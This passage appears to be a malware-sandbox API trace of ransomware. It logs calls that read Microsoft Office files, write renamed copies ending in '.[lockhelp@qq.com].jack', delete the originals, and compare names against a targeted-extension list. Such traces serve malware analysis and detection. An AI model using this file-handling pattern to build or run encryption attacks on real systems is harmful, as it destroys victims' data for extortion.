office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml")) returned 0x220 [0206.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0206.189] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.189] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0206.189] GetLastError () returned 0x0 [0206.189] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0206.333] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0207.340] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0207.340] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0207.340] SetEndOfFile (hFile=0x43c) returned 1 [0207.341] CloseHandle (hObject=0x43c) returned 1 [0207.345] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.345] SetEndOfFile (hFile=0x3d4) returned 1 [0207.346] CloseHandle (hObject=0x3d4) returned 1 [0207.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml")) returned 1 [0207.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.347] lstrlenW (lpString=".doc") returned 4 [0207.347] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.347] lstrlenW (lpString=".docx") returned 5 [0207.347] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.347] lstrlenW (lpString=".pdf") returned 4 [0207.347] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.347] lstrlenW (lpString=".xls") returned 4 [0207.347] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.347] lstrlenW (lpString=".xlsx") returned 5 [0207.347] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.347] lstrlenW (lpString=".ppt") returned 4 [0207.347] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.348] lstrlenW (lpString=".zip") returned 4 [0207.348] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.348] lstrlenW (lpString=".rar") returned 4 [0207.348] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.348] lstrlenW (lpString=".bz2") returned 4 [0207.348] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.348] lstrlenW (lpString=".7z") returned 3 [0207.348] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.348] lstrlenW (lpString=".dbf") returned 4 [0207.348] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.348] lstrlenW (lpString=".1cd") returned 4 [0207.348] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.348] lstrlenW (lpString=".jpg") returned 4 [0207.348] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.348] lstrlenW (lpString=".doc") returned 4 [0207.348] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.348] lstrlenW (lpString=".docx") returned 5 [0207.348] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.348] lstrlenW (lpString=".pdf") returned 4 [0207.348] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.348] lstrlenW (lpString=".xls") returned 4 [0207.348] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.349] lstrlenW (lpString=".xlsx") returned 5 [0207.349] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.349] lstrlenW (lpString=".ppt") returned 4 [0207.349] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.349] lstrlenW (lpString=".zip") returned 4 [0207.349] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.349] lstrlenW (lpString=".rar") returned 4 [0207.349] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.349] lstrlenW (lpString=".bz2") returned 4 [0207.349] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.349] lstrlenW (lpString=".7z") returned 3 [0207.349] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.349] lstrlenW (lpString=".dbf") returned 4 [0207.349] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.349] lstrlenW (lpString=".1cd") returned 4 [0207.349] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 104 [0207.349] lstrlenW (lpString=".jpg") returned 4 [0207.349] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.350] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.350] lstrlenW (lpString="AG00004_.GIF") returned 12 [0207.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0207.353] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=9024) returned 1 [0207.353] CloseHandle (hObject=0x3d4) returned 1 [0207.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif")) returned 0x220 [0207.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0207.354] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.354] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0207.355] GetLastError () returned 0x0 [0207.355] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x2340, lpOverlapped=0x0) returned 1 [0207.440] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x2350, lpOverlapped=0x0) returned 1 [0207.441] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0207.441] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0207.441] SetEndOfFile (hFile=0x43c) returned 1 [0207.441] CloseHandle (hObject=0x43c) returned 1 [0207.445] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.445] SetEndOfFile (hFile=0x3d4) returned 1 [0207.446] CloseHandle (hObject=0x3d4) returned 1 [0207.446] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.447] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0207.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.447] lstrlenW (lpString=".doc") returned 4 [0207.447] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.447] lstrlenW (lpString=".docx") returned 5 [0207.447] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.447] lstrlenW (lpString=".pdf") returned 4 [0207.447] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.447] lstrlenW (lpString=".xls") returned 4 [0207.447] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.447] lstrlenW (lpString=".xlsx") returned 5 [0207.447] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.447] lstrlenW (lpString=".ppt") returned 4 [0207.447] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.447] lstrlenW (lpString=".zip") returned 4 [0207.447] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.447] lstrlenW (lpString=".rar") returned 4 [0207.448] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.448] lstrlenW (lpString=".bz2") returned 4 [0207.448] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.448] lstrlenW (lpString=".7z") returned 3 [0207.448] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.448] lstrlenW (lpString=".dbf") returned 4 [0207.448] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.448] lstrlenW (lpString=".1cd") returned 4 [0207.448] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.448] lstrlenW (lpString=".jpg") returned 4 [0207.448] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.448] lstrlenW (lpString=".doc") returned 4 [0207.448] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.448] lstrlenW (lpString=".docx") returned 5 [0207.448] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.448] lstrlenW (lpString=".pdf") returned 4 [0207.448] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.448] lstrlenW (lpString=".xls") returned 4 [0207.448] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.448] lstrlenW (lpString=".xlsx") returned 5 [0207.448] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.448] lstrlenW (lpString=".ppt") returned 4 [0207.448] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.449] lstrlenW (lpString=".zip") returned 4 [0207.449] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.449] lstrlenW (lpString=".rar") returned 4 [0207.449] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.449] lstrlenW (lpString=".bz2") returned 4 [0207.449] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.449] lstrlenW (lpString=".7z") returned 3 [0207.449] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.449] lstrlenW (lpString=".dbf") returned 4 [0207.449] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.449] lstrlenW (lpString=".1cd") returned 4 [0207.449] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 68 [0207.449] lstrlenW (lpString=".jpg") returned 4 [0207.449] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.449] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.449] lstrlenW (lpString="AG00011_.GIF") returned 12 [0207.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0207.450] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=7216) returned 1 [0207.450] CloseHandle (hObject=0x3d4) returned 1 [0207.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif")) returned 0x220 [0207.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0207.451] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.451] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0207.451] GetLastError () returned 0x0 [0207.451] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x1c30, lpOverlapped=0x0) returned 1 [0207.547] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x1c40, lpOverlapped=0x0) returned 1 [0207.548] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0207.548] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xec, lpOverlapped=0x0) returned 1 [0207.548] SetEndOfFile (hFile=0x43c) returned 1 [0207.549] CloseHandle (hObject=0x43c) returned 1 [0207.553] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.553] SetEndOfFile (hFile=0x3d4) returned 1 [0207.554] CloseHandle (hObject=0x3d4) returned 1 [0207.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.554] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0207.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.554] lstrlenW (lpString=".doc") returned 4 [0207.554] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.554] lstrlenW (lpString=".docx") returned 5 [0207.554] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.554] lstrlenW (lpString=".pdf") returned 4 [0207.554] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.554] lstrlenW (lpString=".xls") returned 4 [0207.555] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.555] lstrlenW (lpString=".xlsx") returned 5 [0207.555] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.555] lstrlenW (lpString=".ppt") returned 4 [0207.555] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.555] lstrlenW (lpString=".zip") returned 4 [0207.555] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.555] lstrlenW (lpString=".rar") returned 4 [0207.555] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.555] lstrlenW (lpString=".bz2") returned 4 [0207.555] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.555] lstrlenW (lpString=".7z") returned 3 [0207.555] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.555] lstrlenW (lpString=".dbf") returned 4 [0207.555] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.555] lstrlenW (lpString=".1cd") returned 4 [0207.555] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.555] lstrlenW (lpString=".jpg") returned 4 [0207.555] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.556] lstrlenW (lpString=".doc") returned 4 [0207.556] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.556] lstrlenW (lpString=".docx") returned 5 [0207.556] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.556] lstrlenW (lpString=".pdf") returned 4 [0207.556] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.556] lstrlenW (lpString=".xls") returned 4 [0207.556] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.556] lstrlenW (lpString=".xlsx") returned 5 [0207.556] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.556] lstrlenW (lpString=".ppt") returned 4 [0207.556] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.556] lstrlenW (lpString=".zip") returned 4 [0207.556] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.556] lstrlenW (lpString=".rar") returned 4 [0207.556] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.556] lstrlenW (lpString=".bz2") returned 4 [0207.556] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.556] lstrlenW (lpString=".7z") returned 3 [0207.556] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.556] lstrlenW (lpString=".dbf") returned 4 [0207.556] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.556] lstrlenW (lpString=".1cd") returned 4 [0207.556] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0207.556] lstrlenW (lpString=".jpg") returned 4 [0207.556] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.557] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.557] lstrlenW (lpString="AG00040_.GIF") returned 12 [0207.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0207.557] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=8097) returned 1 [0207.557] CloseHandle (hObject=0x3d4) returned 1 [0207.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program 